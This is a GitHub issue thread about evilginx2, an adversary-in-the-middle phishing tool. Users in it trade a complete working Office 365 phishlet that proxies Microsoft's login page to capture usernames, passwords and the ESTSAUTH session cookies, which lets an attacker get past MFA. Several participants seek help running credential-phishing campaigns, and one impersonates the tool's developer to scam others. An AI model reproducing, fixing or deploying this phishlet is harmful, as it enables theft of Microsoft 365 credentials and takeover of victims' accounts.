Closed afiqizzuddinz closed 1 year ago
Hi,
The SignInStateCookie needs its domain changed to '.login.microsoftonline.com' for token capturing to start working again.
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
  #- domain: 'login.microsoftonline.com'
  #  keys: ['SignInStateCookie']
The problem I am having right now is that I cannot locate the session cookies. I do not know where to copy from. Anyone that can help me? I was able to capture the username and password. In the token section it says "None".
Replace the o365.yaml phishlet with the following and token capturing should start working again.
name: 'o365'
author: '@jamescullum'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing: false}
  # The lines below are needed if your target organization utilizes ADFS.
  # If they do, you need to uncomment all following lines that contain <...>
  # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
  # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as follows:
  # <insert-adfs-subdomain> = adfs
  # <insert-adfs-host> = example.com
  # <insert-adfs-subdomain-and-host> = adfs.example.com
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing: false}
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing: false}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  # Uncomment and fill in if your target organization utilizes ADFS
  #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'
Thank you for your reply. But this is beyond my comprehension. I swear I do not know how I can replace the o365.yaml phishlet. Is there anyone you can recommend to me that can assist me further, please?
On Mon, 29 Nov 2021 at 6:20 PM, oposm wrote:
see: #677 https://github.com/kgretzky/evilginx2/issues/677
Thank you so much for your quick response. Please, is there anyone that I can add on Telegram or any platform that can teach me or show me how to do this? I am willing to learn, please.
On Tue, Nov 30, 2021 at 6:45 PM Melroy wrote:
see: #677 https://github.com/kgretzky/evilginx2/issues/677
but are you willing to search for basic commands?
No, I am not. I am looking for someone who can connect via SSH and help me fix it, even if it's for a fee. That is the reason I want to connect with the person via Telegram or any platform. Please help me.
On Tue, Nov 30, 2021 at 6:53 PM Melroy wrote:
but are you willing to search for basic commands?
Hello, I have been able to replace the o365.yaml phishlet with the following below, yet the o365 token isn't captured. What can I do, please?
name: 'o365'
author: '@jamescullum'
min_ver: '2.3.0'
proxy_hosts:
sub_filters:
auth_tokens:
All issues can be fixed.... It's caused due to an update on the target end..... You can reach out to the developer on ICQ @mrgretzky
You are a scammer using kgretzky's ID to scam people for phishlets. Guys, beware of him.
DO NOT ASK FOR PHISHLETS.
DO NOT ASK FOR HELP CREATING PHISHLETS.
DO NOT ASK TO FIX PHISHLETS.
DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.
EXPECT A BAN OTHERWISE. THANK YOU!
REPORT ONLY BUGS OR FEATURE SUGGESTIONS.
Hello, I want to ask: o365 doesn't capture the token. Do I need to configure the phishlets, or is there something else, because my account has MFA enabled?